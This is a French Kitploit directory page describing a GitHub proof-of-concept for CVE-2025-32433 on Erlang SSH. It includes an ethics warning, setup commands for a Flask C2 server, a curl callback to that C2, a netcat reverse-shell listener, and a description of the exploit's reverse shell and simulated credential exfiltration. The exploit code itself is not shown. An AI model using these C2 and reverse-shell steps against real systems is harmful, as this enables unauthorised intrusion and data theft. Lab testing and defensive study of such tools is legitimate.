Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_CVE-2025-32433 — Preuve de concept d'exploit pour CVE-2025-32433 avec des modes d'attaque simulé et réel, incluant un serveur C2 basé sur Flask pour les rappels de shell inverse et la simulation de post-exploitation. | Kitploit
Outils/GitHubGitHub/ekomssavior/poc_cve-2025-32433
Analyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

Preuve de concept d'exploit pour CVE-2025-32433 avec des modes d'attaque simulé et réel, incluant un serveur C2 basé sur Flask pour les rappels de shell inverse et la simulation de post-exploitation.

Voir le dépôt
527il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ Avertissement éthique

Ce dépôt contient du code qui démontre une véritable CVE (CVE-2025-32433).
Utilisez-le uniquement dans des environnements où vous avez une autorisation explicite.

Ne testez jamais cette exploitation contre des systèmes que vous ne possédez ou ne gérez pas.
Une utilisation non autorisée est illégale, contraire à l'éthique et nuisible à la communauté de la cybersécurité.

POC simulé et réel pour CVE-2025-32433

Mon pote Chocapikk m'a montré ce POC trouvé erling_cve.py, j'étais intrigué et je voulais le tester dans un environnement sûr.

Vous avez deux choix avec ce dépôt : le script simulé sûr et le système que je présente ci-dessous.

ou vous pouvez utiliser le vrai erling_cve.py (de manière éthique, avec prudence et uniquement sur des réseaux pour lesquels vous avez l'autorisation de tester).

Avant d'utiliser cet outil pour tester ou exécuter une véritable exploitation, consultez mon pote m0usemm0use et son script Python pour trouver des cibles vulnérables à CVE-2025-32433 !!!!

https://github.com/m0usem0use/erl_mouse


Version SIMULÉE de l'exploit pour CVE-2025-32433

Configurer le serveur C2

Construisez un C2 basé sur Python Flask : puissant pour les rappels de bots ou les shells inversés.

Exécutez ce script d'installation sur le serveur C2

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (collez le script c2_server, modifiez si nécessaire)

Exécutez

python3 c2_server.py

Les bots (ou scripts de test) peuvent faire un curl vers la maison comme ceci

curl -X POST http://:8080/report -d "Bot is online"

Configurer l'environnement virtuel Python sur Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Créez un environnement virtuel Python

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Tester le rappel

nano test_callback.py (collez le script test_callback, modifiez si nécessaire)

Exécutez le rappel

python3 test_callback.py

Vous avez désormais officiellement

Un environnement virtuel fonctionnel

Un C2 cloud en direct

Une injection de rappel fonctionnelle

-Vous avez besoin que la machine cible/victime ait un processus ou service Erlang exposé (ou simulé)


QUE FAIT erling_cve.py ?

Se connecte au port 22 d'une IP cible

Envoie une fausse chaîne de version SSH

Envoie un paquet conçu (susceptible de déclencher une vulnérabilité — faisant semblant d'abuser de quelque chose comme le gestionnaire SSH non documenté d'Erlang ou un débordement de tampon)

Déclenche un shell inversé vers l'IP de l'attaquant

Simule la post-exploitation en exécutant des commandes comme whoami, uname, et une fausse "exfiltration de credentials" vers /tmp/exfil.log

Nous allons prendre notre PoC trouvé de type Erlang et

Le rendre fonctionnel dans l'environnement virtuel Kali

Le connecter pour signaler à notre C2 cloud lorsque l'"attaque" s'exécute

L'exécuter de manière éthique et sécurisée dans un laboratoire contrôlé

Regardez-le générer /tmp/exfil.log pour simuler des données volées


Depuis la machine Kali

nano poc_erlang_test.py

-collez dans poc_erlang_test.py et modifiez si nécessaire

Ouvrir un écouteur

dans un nouveau terminal, exécutez

nc -lvnp 4444

Exécutez le PoC

python poc_erlang_test.py --real

Télécharger l’outil